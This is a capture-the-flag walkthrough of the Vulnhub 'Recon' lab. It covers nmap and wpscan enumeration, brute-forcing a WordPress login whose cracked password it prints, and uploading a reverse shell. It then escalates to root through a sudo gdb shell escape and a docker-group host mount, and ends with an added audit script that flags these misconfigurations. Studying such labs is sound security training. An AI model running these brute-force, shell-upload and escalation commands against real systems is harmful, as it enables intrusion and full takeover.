Vulnhub – Recon Walkthrough

We start with a full port scan: nmap -A -T4 -p- 192.168.1.15 -vv

Port 80 is open and we can see it's a WordPress site, so we enumerate users with wpscan --url http://192.168.1.15 -e u

Before starting the brute force, I found a file named hack.zip in the uploads directory.

I downloaded the file to my machine and looked inside it: it looks like a PHP script that spawns a shell back from the target machine, and it even contains the IP of my machine and the port 4545. I'm going to change the port to 4444 and save it for now.

Now we brute force the WordPress login with wpscan --url http://192.168.1.15 -U reconauthor -P /root/pass/rockyou.txt and get the password:

Username: reconauthor, password: football7

In the posts section we can see there's a post called "add playload".

I'm going to upload the file I found, renamed to hack2.zip, with a file named index.html packed alongside it so that the upload goes through without any errors.

That ran into a problem: the hack.zip shell I found has a timeout, so I'm going to upload my own shell instead and visit http://192.168.1.15/wp-content/uploads/articulate_uploads/shell/shell.php

Now we find that the user www-data can run gdb as offensivehack via sudo, and gdb can spawn a shell:

sudo -u offensivehack gdb -nx -ex '!sh' -ex quit

The user offensivehack is a member of the docker group, which we can use to escalate privileges from here:

sh -c 'cp $(which docker) .; chmod +s ./docker'

./docker run -v /:/mnt --rm -it alpine chroot /mnt sh

Now we grab the flag, which is in the /root directory.
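Seen from the defender's side, this box falls to two misconfigurations: a sudo rule letting www-data run a shell-capable binary (gdb) as another user, and that user's membership in the docker group, with a setuid copy of docker left behind as an artefact. The audit script below is an added example, not part of the original walkthrough; the sudoers rule, group line, setuid listing and function names are constructed assumptions, not copied from the VM.

```shell
#!/bin/sh
# Added audit helper; not part of the original walkthrough. Each function
# takes file content as a string, so it runs offline on the constructed
# samples below; on a live host feed it /etc/sudoers, /etc/group and the
# output of `find / -perm -4000 -type f` instead.

# Constructed samples mirroring the box's misconfigurations (the exact
# rule text and group line are assumptions, not copied from the VM).
SAMPLE_SUDOERS='www-data ALL=(offensivehack) NOPASSWD: /usr/bin/gdb'
SAMPLE_GROUP='docker:x:999:offensivehack
sudo:x:27:admin'
SAMPLE_SETUID='/usr/bin/passwd
/usr/bin/sudo
/home/offensivehack/docker'

# Sudo rules whose target can spawn a shell (gdb's !sh, vim's :!, ...) are
# root-equivalent: print each such rule, exit 0 if any were found, else 1.
risky_sudo_rules() {
  printf '%s\n' "$1" | awk '
    /^[[:space:]]*#/ || /^[[:space:]]*$/ { next }
    /(^|[[:space:]]|\/)(gdb|vim|vi|less|more|awk|perl|python[0-9.]*|find|env)([[:space:]]|$)/ {
      print "shell-capable binary in sudo rule: " $0; found = 1 }
    END { exit found ? 0 : 1 }'
}

# docker group members can mount / into a container, so they are effectively
# root: print them, exit 0 if the group has any members, else 1.
docker_group_members() {
  printf '%s\n' "$1" | awk -F: '
    $1 == "docker" && $4 != "" {
      n = split($4, u, ","); for (i = 1; i <= n; i++) print u[i]; found = 1 }
    END { exit found ? 0 : 1 }'
}

# Setuid files outside package-managed trees are a classic persistence
# artefact (here: a copied docker binary with chmod +s in a home directory).
unexpected_setuid() {
  printf '%s\n' "$1" | awk '
    NF == 0 { next }
    !/^\/(usr|bin|sbin|lib|lib64)\// { print "setuid outside system dirs: " $0; found = 1 }
    END { exit found ? 0 : 1 }'
}

risky_sudo_rules "$SAMPLE_SUDOERS"
docker_group_members "$SAMPLE_GROUP"
unexpected_setuid "$SAMPLE_SETUID"
```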
